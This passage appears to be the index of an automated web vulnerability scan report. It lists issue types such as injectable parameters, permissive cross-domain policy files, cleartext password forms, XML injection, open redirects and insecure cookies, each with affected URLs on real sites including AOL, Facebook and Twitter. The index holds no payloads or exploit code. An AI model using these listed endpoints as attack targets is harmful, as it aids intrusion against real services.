5.238. http://mmafighting.com/traffic/ [lg parameter]

5.239. http://mmafighting.com/traffic/ [name of an arbitrarily supplied request parameter]

5.240. http://mmafighting.com/traffic/ [os parameter]

5.241. http://mmafighting.com/traffic/ [pw parameter]

5.242. http://mmafighting.com/traffic/ [rsv parameter]

5.243. http://mmafighting.com/traffic/ [rv parameter]

5.244. http://mmafighting.com/traffic/ [t parameter]

5.245. http://mmafighting.com/traffic/ [tz parameter]

5.246. http://switched.com/ [name of an arbitrarily supplied request parameter]

5.247. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

5.248. http://walletpop.com/ [name of an arbitrarily supplied request parameter]

5.249. http://www.aol.com/ [dlact cookie]

5.250. http://www.aol.com/ [rrpmo1 cookie]

5.251. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 [REST URL parameter 3]

5.252. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 [REST URL parameter 3]

5.253. http://www.facebook.com/people/Bucky-Jordan/100000824820783 [REST URL parameter 3]

5.254. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 [REST URL parameter 4]

6. Flash cross-domain policy

6.1. http://a0.twimg.com/crossdomain.xml

6.2. http://about-search.aol.com/crossdomain.xml

6.3. http://ad.doubleclick.net/crossdomain.xml

6.4. http://ads.pointroll.com/crossdomain.xml

6.5. http://ads.undertone.com/crossdomain.xml

6.6. http://adx.adnxs.com/crossdomain.xml

6.7. http://altfarm.mediaplex.com/crossdomain.xml

6.8. http://apartments.rentedspaces.oodle.com/crossdomain.xml

6.9. http://api.bit.ly/crossdomain.xml

6.10. http://api.oscar.aol.com/crossdomain.xml

6.11. http://api.screenname.aol.com/crossdomain.xml

6.12. https://api.screenname.aol.com/crossdomain.xml

6.13. http://ar.voicefive.com/crossdomain.xml

6.14. http://at.atwola.com/crossdomain.xml

6.15. https://at.atwola.com/crossdomain.xml

6.16. http://b.scorecardresearch.com/crossdomain.xml

6.17. http://b.voicefive.com/crossdomain.xml

6.18. http://bongo.zoomin.tv/crossdomain.xml

6.19. http://browser.cdn.aol.com/crossdomain.xml

6.20. http://bs.serving-sys.com/crossdomain.xml

6.21. http://c.brightcove.com/crossdomain.xml

6.22. http://cdn.at.atwola.com/crossdomain.xml

6.23. http://cdn.cinesport.com/crossdomain.xml

6.24. http://cdn.digitalcity.com/crossdomain.xml

6.25. http://cdn.eyewonder.com/crossdomain.xml

6.26. http://cdn4.eyewonder.com/crossdomain.xml

6.27. http://clk.atdmt.com/crossdomain.xml

6.28. http://config.hulu.com/crossdomain.xml

6.29. http://content.mqcdn.com/crossdomain.xml

6.30. http://coverage.mqcdn.com/crossdomain.xml

6.31. http://d.tradex.openx.com/crossdomain.xml

6.32. http://d.xp1.ru4.com/crossdomain.xml

6.33. http://d1.openx.org/crossdomain.xml

6.34. http://daol.aol.com/crossdomain.xml

6.35. http://eatps.web.aol.com:9000/crossdomain.xml

6.36. http://expapi.oscar.aol.com/crossdomain.xml

6.37. http://external.ak.fbcdn.net/crossdomain.xml

6.38. http://fls.doubleclick.net/crossdomain.xml

6.39. http://graph.facebook.com/crossdomain.xml

6.40. http://gravatar.com/crossdomain.xml

6.41. http://ib.adnxs.com/crossdomain.xml

6.42. http://idcs.interclick.com/crossdomain.xml

6.43. http://img-cdn.mediaplex.com/crossdomain.xml

6.44. http://img.mediaplex.com/crossdomain.xml

6.45. http://lifestream.aol.com/crossdomain.xml

6.46. http://log30.doubleverify.com/crossdomain.xml

6.47. http://metrics.apple.com/crossdomain.xml

6.48. http://mobile.aol.com/crossdomain.xml

6.49. http://o.sa.aol.com/crossdomain.xml

6.50. http://pixel.quantserve.com/crossdomain.xml

6.51. http://portal.pf.aol.com/crossdomain.xml

6.52. http://puma.vizu.com/crossdomain.xml

6.53. http://r.unicornmedia.com/crossdomain.xml

6.54. http://r1-ads.ace.advertising.com/crossdomain.xml

6.55. http://s.gravatar.com/crossdomain.xml

6.56. http://s3.cinesport.com/crossdomain.xml

6.57. http://search.twitter.com/crossdomain.xml

6.58. http://secure-us.imrworldwide.com/crossdomain.xml

6.59. http://segment-pixel.invitemedia.com/crossdomain.xml

6.60. http://speed.pointroll.com/crossdomain.xml

6.61. http://sportingnews.122.2o7.net/crossdomain.xml

6.62. http://sportsillustrated.cnn.com/crossdomain.xml

6.63. http://t.mookie1.com/crossdomain.xml

6.64. http://tcr.tynt.com/crossdomain.xml

6.65. http://www.aolcdn.com/crossdomain.xml

6.66. http://www.everydayhealth.com/crossdomain.xml

6.67. http://www.huffingtonpost.com/crossdomain.xml

6.68. http://www.mapquest.com/crossdomain.xml

6.69. http://xml.truveo.com/crossdomain.xml

6.70. http://abcnews.go.com/crossdomain.xml

6.71. http://about.aol.com/crossdomain.xml

6.72. http://ad.wsod.com/crossdomain.xml

6.73. http://add.my.yahoo.com/crossdomain.xml

6.74. http://ads.tw.adsonar.com/crossdomain.xml

6.75. https://adwords.google.com/crossdomain.xml

6.76. http://aol.sportingnews.com/crossdomain.xml

6.77. http://aol.worldwinner.com/crossdomain.xml

6.78. http://api.local.yahoo.com/crossdomain.xml

6.79. http://ar-ar.facebook.com/crossdomain.xml

6.80. http://ax.itunes.apple.com/crossdomain.xml

6.81. http://developers.facebook.com/crossdomain.xml

6.82. http://disqus.com/crossdomain.xml

6.83. http://fantasysource.sportingnews.com/crossdomain.xml

6.84. http://feeds.bbci.co.uk/crossdomain.xml

6.85. http://googleads.g.doubleclick.net/crossdomain.xml

6.86. http://images.apple.com/crossdomain.xml

6.87. http://itunes.apple.com/crossdomain.xml

6.88. http://js.adsonar.com/crossdomain.xml

6.89. http://legal.aol.com/crossdomain.xml

6.90. http://money.cnn.com/crossdomain.xml

6.91. http://music.aol.com/crossdomain.xml

6.92. http://my.screenname.aol.com/crossdomain.xml

6.93. https://my.screenname.aol.com/crossdomain.xml

6.94. http://newsrss.bbc.co.uk/crossdomain.xml

6.95. http://o.aolcdn.com/crossdomain.xml

6.96. http://pagead2.googlesyndication.com/crossdomain.xml

6.97. http://picasaweb.google.com/crossdomain.xml

6.98. http://privacy.aol.com/crossdomain.xml

6.99. http://pubads.g.doubleclick.net/crossdomain.xml

6.100. http://realestate.aol.com/crossdomain.xml

6.101. http://redir.adsonar.com/crossdomain.xml

6.102. https://secure.opinionlab.com/crossdomain.xml

6.103. http://static.ak.fbcdn.net/crossdomain.xml

6.104. http://television.aol.com/crossdomain.xml

6.105. https://us.etrade.com/crossdomain.xml

6.106. http://video.aol.com/crossdomain.xml

6.107. http://video.foxbusiness.com/crossdomain.xml

6.108. http://video.google.com/crossdomain.xml

6.109. http://weather.aol.com/crossdomain.xml

6.110. http://www.aol.com/crossdomain.xml

6.111. http://www.aolnews.com/crossdomain.xml

6.112. http://www.apple.com/crossdomain.xml

6.113. http://www.blogsmithmedia.com/crossdomain.xml

6.114. http://www.citysbest.com/crossdomain.xml

6.115. http://www.dailyfinance.com/crossdomain.xml

6.116. http://www.dooce.com/crossdomain.xml

6.117. http://www.facebook.com/crossdomain.xml

6.118. https://www.facebook.com/crossdomain.xml

6.119. http://www.ft.com/crossdomain.xml

6.120. https://www.godaddy.com/crossdomain.xml

6.121. http://www.ibm.com/crossdomain.xml

6.122. http://www.marketwatch.com/crossdomain.xml

6.123. http://www.mmafighting.com/crossdomain.xml

6.124. http://www.moviefone.com/crossdomain.xml

6.125. http://www.netvibes.com/crossdomain.xml

6.126. http://www.pageflakes.com/crossdomain.xml

6.127. http://www.popeater.com/crossdomain.xml

6.128. http://www.realtytrac.com/crossdomain.xml

6.129. http://www.tuaw.com/crossdomain.xml

6.130. http://aolmobile.aol.com/crossdomain.xml

6.131. http://aolmobile.aolcdn.com/crossdomain.xml

6.132. http://api.twitter.com/crossdomain.xml

6.133. http://citi.bridgetrack.com/crossdomain.xml

6.134. http://docs.google.com/crossdomain.xml

6.135. http://s.stats.wordpress.com/crossdomain.xml

6.136. http://static.twitter.com/crossdomain.xml

6.137. http://stats.wordpress.com/crossdomain.xml

6.138. http://twitter.com/crossdomain.xml

6.139. https://twitter.com/crossdomain.xml

6.140. http://www.truveo.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://ads.pointroll.com/clientaccesspolicy.xml

7.3. http://api.oscar.aol.com/clientaccesspolicy.xml

7.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.5. http://b.voicefive.com/clientaccesspolicy.xml

7.6. http://cdn.eyewonder.com/clientaccesspolicy.xml

7.7. http://clk.atdmt.com/clientaccesspolicy.xml

7.8. http://expapi.oscar.aol.com/clientaccesspolicy.xml

7.9. http://metrics.apple.com/clientaccesspolicy.xml

7.10. http://o.aolcdn.com/clientaccesspolicy.xml

7.11. http://o.sa.aol.com/clientaccesspolicy.xml

7.12. http://s.stats.wordpress.com/clientaccesspolicy.xml

7.13. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.14. http://speed.pointroll.com/clientaccesspolicy.xml

7.15. http://sportingnews.122.2o7.net/clientaccesspolicy.xml

7.16. http://stats.wordpress.com/clientaccesspolicy.xml

7.17. http://www.aol.com/clientaccesspolicy.xml

7.18. http://ts1.mm.bing.net/clientaccesspolicy.xml

7.19. http://ts2.mm.bing.net/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://appworld.blackberry.com/webstore/content/13833

8.2. http://appworld.blackberry.com/webstore/content/13833

8.3. http://appworld.blackberry.com/webstore/content/13833

8.4. http://appworld.blackberry.com/webstore/content/19143

8.5. http://appworld.blackberry.com/webstore/content/19143

8.6. http://appworld.blackberry.com/webstore/content/19143

8.7. http://digg.com/submit

8.8. http://o.aolcdn.com/art/merge/

8.9. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

8.10. http://top-sec.net/vb/

8.11. http://top-sec.net/vb/calendar.php

8.12. http://top-sec.net/vb/faq.php

8.13. http://top-sec.net/vb/forumdisplay.php

8.14. http://top-sec.net/vb/index.php

8.15. http://top-sec.net/vb/login.php

8.16. http://top-sec.net/vb/member.php

8.17. http://top-sec.net/vb/memberlist.php

8.18. http://top-sec.net/vb/online.php

8.19. http://top-sec.net/vb/online.php

8.20. http://top-sec.net/vb/profile.php

8.21. http://top-sec.net/vb/profile.php

8.22. http://top-sec.net/vb/search.php

8.23. http://top-sec.net/vb/sendmessage.php

8.24. http://top-sec.net/vb/showgroups.php

8.25. http://top-sec.net/vb/showthread.php

8.26. http://top-sec.net/vb/tags.php

8.27. http://www.facebook.com/

8.28. http://www.facebook.com/r.php

8.29. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

8.30. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

9. XML injection

9.1. http://jb.speakertext.com/player/speakertext.css [REST URL parameter 1]

9.2. http://jb.speakertext.com/player/speakertext.css [REST URL parameter 2]

9.3. http://pixel.quantserve.com/seg/r [REST URL parameter 1]

9.4. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.5. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.6. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.7. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.8. http://platform2.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.9. http://platform2.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.10. http://use.typekit.com/p/uni0vle.js [REST URL parameter 1]

9.11. http://use.typekit.com/p/uni0vle.js [REST URL parameter 2]

10. SSL cookie without secure flag set

10.1. https://twitter.com/signup

10.2. https://www.fightmagazine.com/mma-magazine/subscribe.asp

10.3. https://www.godaddy.com/

10.4. https://www.godaddy.com/domains/search.aspx

10.5. https://account.login.aol.com/_cqr/opr/opr.psp

10.6. https://aolproductcentral.aol.com/ClickBroker

10.7. https://bill.aol.com/SPortal/jsp/main.jsp

10.8. https://bill.aol.com/SPortal/jsp/notify_about_notify.jsp

10.9. https://maps-api-ssl.google.com/maps

10.10. https://my.screenname.aol.com/_cqr/login/checkStatus.psp

10.11. https://my.screenname.aol.com/_cqr/login/jslogin.psp

10.12. https://my.screenname.aol.com/_cqr/login/login.psp

10.13. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp

10.14. https://my.screenname.aol.com/badbrowser.psp

10.15. https://us.etrade.com/e/t/welcome/whychooseetrade

10.16. https://www.facebook.com/

10.17. https://www.facebook.com/ajax/intl/language_dialog.php

10.18. https://www.facebook.com/h02332

10.19. https://www.facebook.com/h02332

10.20. https://www.facebook.com/h02332

10.21. https://www.facebook.com/help/contact.php

10.22. https://www.facebook.com/login.php

10.23. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

10.24. https://www.facebook.com/pages/create.php

10.25. https://www.facebook.com/r.php

10.26. https://www.facebook.com/recover.php

10.27. https://www.godaddy.com/gdshop/hosting/landing.asp

10.28. https://www.godaddy.com/gdshop/registrar/search.asp

10.29. https://www.godaddy.com/gdshop/website.asp

11. Session token in URL

11.1. http://aolmobile.aol.com/registration/include/registration_unified.css

11.2. http://aolmobile.aol.com/registration/welcome

11.3. http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-computer-checkup/

11.4. http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-quick-check-live/

11.5. http://feedburner.google.com/fb/a/mailverify

11.6. https://new.aol.com/productsweb/subflows/FreeMemberRegistration/FreeAolRegistrationAction.do

11.7. http://weather.aol.com/

11.8. http://www.facebook.com/extern/login_status.php

12. SSL certificate

12.1. https://secure.opinionlab.com/

12.2. https://www.facebook.com/

12.3. https://account.login.aol.com/

12.4. https://adwords.google.com/

12.5. https://aolproductcentral.aol.com/

12.6. https://api.screenname.aol.com/

12.7. https://at.atwola.com/

12.8. https://bill.aol.com/

12.9. https://chrome.google.com/

12.10. https://maps-api-ssl.google.com/

12.11. https://my.screenname.aol.com/

12.12. https://new.aol.com/

12.13. https://rsp.web.aol.com/

12.14. https://spreadsheets.google.com/

12.15. https://twitter.com/

12.16. https://us.etrade.com/

12.17. https://www.fightmagazine.com/

12.18. https://www.godaddy.com/

12.19. https://www.neodata.com/

13. Password field submitted using GET method

13.1. http://digg.com/submit

13.2. http://o.aolcdn.com/art/merge/

14. ASP.NET ViewState without MAC enabled

14.1. http://www.bankrate.com/funnel/mortgages/

14.2. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

14.3. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

14.4. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

14.5. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

15. Open redirection

15.1. http://b.scorecardresearch.com/r [d.c parameter]

15.2. http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter]

16. Cookie scoped to parent domain

16.1. http://api.twitter.com/

16.2. http://api.twitter.com/1/statuses/66119447177474049/retweeted_by.json

16.3. http://api.twitter.com/1/statuses/show.json

16.4. http://api.twitter.com/1/statuses/user_timeline.json

16.5. http://t.mookie1.com/t/v1/imp

16.6. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

16.7. http://www.mapquest.com/

16.8. http://www.mapquest.com/_svc/ad/getads

16.9. http://www.mapquest.com/_svc/apixel

16.10. http://www.mapquest.com/_svc/publishing/promo

16.11. http://www.mapquest.com/_svc/searchio

16.12. http://www.mapquest.com/cdn/_uac/adpage.htm

16.13. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

16.14. http://www.mapquest.com/icons/stop.png

16.15. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

16.16. http://abcnews.go.com/Entertainment/popup

16.17. http://add.my.yahoo.com/content

16.18. http://ads.pointroll.com/PortalServe/

16.19. https://adwords.google.com/select/Login

16.20. http://adx.adnxs.com/mapuid

16.21. http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-2

16.22. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-2

16.23. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-6

16.24. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

16.25. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

16.26. http://altfarm.mediaplex.com/ad/tr/10105-123060-1629-13

16.27. http://altfarm.mediaplex.com/ad/tr/10105-123060-1629-14

16.28. http://aol.worldwinner.com/cgi/welcome/21sie

16.29. http://aolmobile.aol.com/registration/changeSettings

16.30. http://aolmobile.aol.com/registration/deleteDevice

16.31. http://aolmobile.aol.com/registration/generateConfCode

16.32. http://aolmobile.aol.com/registration/validateConfirmCode

16.33. http://apartments.rentedspaces.oodle.com/

16.34. http://ar-ar.facebook.com/login.php

16.35. http://ar.voicefive.com/b/wc_beacon.pli

16.36. http://ar.voicefive.com/bmx3/broker.pli

16.37. http://ar.voicefive.com/bmx3/broker.pli

16.38. http://b.aol.com/vanity/

16.39. http://b.dailyfinance.com/vanity/

16.40. http://b.huffingtonpost.com/vanity/

16.41. http://b.mmafighting.com/vanity/

16.42. http://b.scorecardresearch.com/b

16.43. http://b.scorecardresearch.com/p

16.44. http://b.scorecardresearch.com/r

16.45. http://b.voicefive.com/b

16.46. http://bid.openx.net/json

16.47. http://blogsearch.google.com/

16.48. http://books.google.com/bkshp

16.49. http://books.google.com/books

16.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.52. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4

16.53. http://clk.atdmt.com/CNT/go/319709115/direct

16.54. http://clk.atdmt.com/M0N/go/314366790/direct

16.55. http://clk.atdmt.com/NYC/go/310177527/direct

16.56. http://clk.atdmt.com/go/253735206/direct

16.57. http://clk.atdmt.com/go/253735225/direct

16.58. http://clk.atdmt.com/go/253735228/direct

16.59. http://clk.atdmt.com/go/310177527/direct

16.60. http://clk.atdmt.com/go/314366790/direct

16.61. http://clk.atdmt.com/go/319709115/direct

16.62. http://developers.facebook.com/

16.63. http://developers.facebook.com/plugins/

16.64. http://feedburner.google.com/fb/a/mailverify

16.65. http://fls.doubleclick.net/activityi

16.66. http://fusion.google.com/add

16.67. http://googleads.g.doubleclick.net/aclk

16.68. http://graph.facebook.com/10134017/picture

16.69. http://groups.google.com/grphp

16.70. http://ib.adnxs.com/getuid

16.71. http://ib.adnxs.com/seg

16.72. http://id.google.com/verify/EAAAAC-C2hTTg1_wpgNVul6NqWU.gif

16.73. http://idcs.interclick.com/Segment.aspx

16.74. http://image3.pubmatic.com/AdServer/UPug

16.75. http://images.apple.com/global/nav/styles/navigation.css

16.76. http://leadback.advertising.com/adcedge/lb

16.77. https://maps-api-ssl.google.com/maps

16.78. http://maps.google.com/maps

16.79. http://picasaweb.google.com/data/feed/base/user/h02332/albumid/5537331698402427137

16.80. http://picasaweb.google.com/home

16.81. http://picasaweb.google.com/lh/view

16.82. http://pixel.quantserve.com/pixel

16.83. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif

16.84. http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif

16.85. http://r1-ads.ace.advertising.com/click/site=0000743226/mnum=0000894907/cstr=63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,1_/xsxdata=1:93232707/bnum=63245784/optn=64

16.86. http://r1-ads.ace.advertising.com/click/site=0000743227/mnum=0000894905/cstr=97154103=_4dc1f637,3024464342,743227^894905^1183^0,1_/xsxdata=1:93310501/bnum=97154103/optn=64

16.87. http://r1-ads.ace.advertising.com/click/site=0000800563/mnum=0000894873/cstr=84248618=_4dc1f63b,0642027268,800563^894873^1183^0,1_/xsxdata=$xsxdata/bnum=84248618/optn=64

16.88. http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000894875/cstr=24626462=_4dc1f67d,5365043223,804145^894875^1183^0,1_/xsxdata=1:93312584/bnum=24626462/optn=64

16.89. http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000956559/cstr=31568465=_4dc1f67d,1346633562,804145^956559^1183^0,1_/xsxdata=1:93313567/bnum=31568465/optn=64

16.90. http://r1-ads.ace.advertising.com/site=743206/size=300250/u=2/bnum=47128691/xsxdata=1:93306656/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.mapquest.com%252F%253Fncid%253Dtxtlnkmqmq00000001

16.91. http://r1-ads.ace.advertising.com/site=743207/size=300250/u=2/bnum=29138469/xsxdata=1:93241795/hr=12/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FAndroid%252Fdailyfinance%252F

16.92. http://r1-ads.ace.advertising.com/site=743207/size=300250/u=2/bnum=55333782/xsxdata=1:93241795/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FiPhone%252Fengadget%252F

16.93. http://r1-ads.ace.advertising.com/site=743226/size=728090/u=2/bnum=63245784/xsxdata=1:93232707/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmusic.aol.com%252Fradioguide%252Fbb

16.94. http://r1-ads.ace.advertising.com/site=743227/size=300250/u=2/bnum=97154103/xsxdata=1:93310501/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Frealestate.aol.com%252F%253Ficid%253Dnavbar_realest_main5

16.95. http://r1-ads.ace.advertising.com/site=790523/size=300250/u=2/bnum=26673240/xsxdata=1:93310299/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545

16.96. http://r1-ads.ace.advertising.com/site=790523/size=728090/u=2/bnum=35460744/xsxdata=1:93306882/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545

16.97. http://r1-ads.ace.advertising.com/site=800563/size=300250/u=2/bnum=84248618/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F%253Ficid%253Dnavbar_huffpo_main5

16.98. http://r1-ads.ace.advertising.com/site=804145/size=300250/u=2/bnum=31568465/xsxdata=1:93313567/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

16.99. http://r1-ads.ace.advertising.com/site=804145/size=728090/u=2/bnum=24626462/xsxdata=1:93312584/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

16.100. http://realestate.aol.com/

16.101. http://scholar.google.com/schhp

16.102. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s32555036570411

16.103. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s34991793073713

16.104. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41508008833043

16.105. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41670060879550

16.106. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42057272375095

16.107. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42119171968661

16.108. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42397612622007

16.109. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42653564326465

16.110. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42715447763912

16.111. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42953626681119

16.112. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42998947284650

16.113. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43049185345880

16.114. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4310452240519

16.115. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43305702756624

16.116. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43513301596976

16.117. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43547210348770

16.118. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4364950429648

16.119. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43829343500547

16.120. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4407522239256

16.121. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4419304328970

16.122. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4424447611439

16.123. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44325433499179

16.124. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44696885943412

16.125. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44929469036869

16.126. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45011387388221

16.127. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45177161318715

16.128. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45238099694252

16.129. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45327582890167

16.130. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45334947153460

16.131. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45375636194366

16.132. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45471094280947

16.133. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45570401758886

16.134. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45670967234764

16.135. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45689243038650

16.136. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45696645958814

16.137. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46401418154127

16.138. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46547738644294

16.139. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46606079612392

16.140. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46721464460715

16.141. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46752376970835

16.142. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4694483816623

16.143. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47134800327476

16.144. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47243939966429

16.145. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47805332352872

16.146. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47930286049377

16.147. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48242398074362

16.148. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4827615687157

16.149. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48352218910586

16.150. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48578549234662

16.151. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48622659663669

16.152. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48943998781032

16.153. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49281189679168

16.154. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49337460868991

16.155. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49353421742562

16.156. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49393149293027

16.157. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49413108131848

16.158. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49435746781527

16.159. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49873315552249

16.160. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49904012384358

16.161. http://sportingnews.us.intellitxt.com/intellitxt/front.asp

16.162. http://tacoda.at.atwola.com/rtx/r.js

16.163. http://tags.bluekai.com/site/3200

16.164. http://tags.bluekai.com/site/450

